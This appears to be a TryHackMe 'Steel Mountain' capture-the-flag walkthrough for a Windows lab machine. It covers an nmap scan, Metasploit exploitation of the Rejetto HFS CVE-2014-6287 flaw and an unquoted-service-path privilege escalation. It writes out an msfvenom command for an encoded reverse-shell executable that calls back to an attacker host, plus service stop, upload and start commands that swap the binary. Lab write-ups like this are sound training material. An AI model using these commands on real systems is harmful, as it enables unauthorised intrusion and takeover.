# Steel Mountain
![alt cover](https://tryhackme-images.s3.amazonaws.com/room-icons/c9030a2b60bb7d1cf4fcb6e5032526d3.jpeg)
- Name: Steel Mountain
- Description: Hack into a Mr. Robot themed Windows machine. Use metasploit for initial access, utilise powershell for Windows privilege escalation enumeration and learn a new technique to get Administrator access.


## Introduction:
- Who is the employee of the month?
  ![alt image](https://media.discordapp.net/attachments/823597727887261768/824657877868347402/unknown.png)
  - Answer: Bill Harper.

## Initial Access:
- Scan the machine with nmap. What is the other port running a web server on?
  ```bash
  nmap -sC -sV [MACHINE_IP] -oN nmap_scan && cat nmap_scan | grep open
  ```
  ![alt image](https://media.discordapp.net/attachments/823597727887261768/824658690773745736/unknown.png)
  - Answer: 8080.
- Take a look at the other web server. What file server is running?
  ![alt image](https://media.discordapp.net/attachments/823597727887261768/824660362170859556/unknown.png)
  - Answer: Rejetto HTTP File Server.
- What is the CVE number to exploit this file server?
  ![alt image](https://media.discordapp.net/attachments/823597727887261768/824660596740849694/unknown.png)
  - Answer: 2014-6287.
- Use Metasploit to get an initial shell. What is the user flag?
  ![alt iamge](https://media.discordapp.net/attachments/823597727887261768/824661699809378324/unknown.png)
  ```bash
  type C:\Users\bill\Desktop\user.txt
  ```
  - Answer: *content of C:\Users\bill\Desktop\user.txt*

## Privilege  Escalation:
- Take close attention to the CanRestart option that is set to true. What is the name of the name of the service which shows up as an unquoted service path vulnerability?
  ![alt image](https://media.discordapp.net/attachments/823597727887261768/824993074890408006/unknown.png)
  ```
  for privilage escalation use: https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1
  ```
  - Answer: AdvancedSystemCareService9.
- What is the root flag?
  ![alt image](https://media.discordapp.net/attachments/823597727887261768/825000809691480180/unknown.png?width=1620&height=304)
  ```bash
  # On your machine generate the reverse shell with msfvenom
  msfvenom -p windows/shell_reverse_tcp LHOST=[YOUR_IP] LPORT=1234 -e x86/shikata_ga_nai -f exe -o ASCService.exe
  # start multi hander with payload windows/shell_reverse_tcp on Metasploit
  # On target machine with shell
  sc stop AdvancedSystemCareService9
  # On target with meterpreter.
  upload [reverseshell_path] "\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"
  # On target with shell
  sc start AdvancedSystemCareService9
  ```
  - Answer: *content of C:\Users\Administrator\Desktop\root.txt*
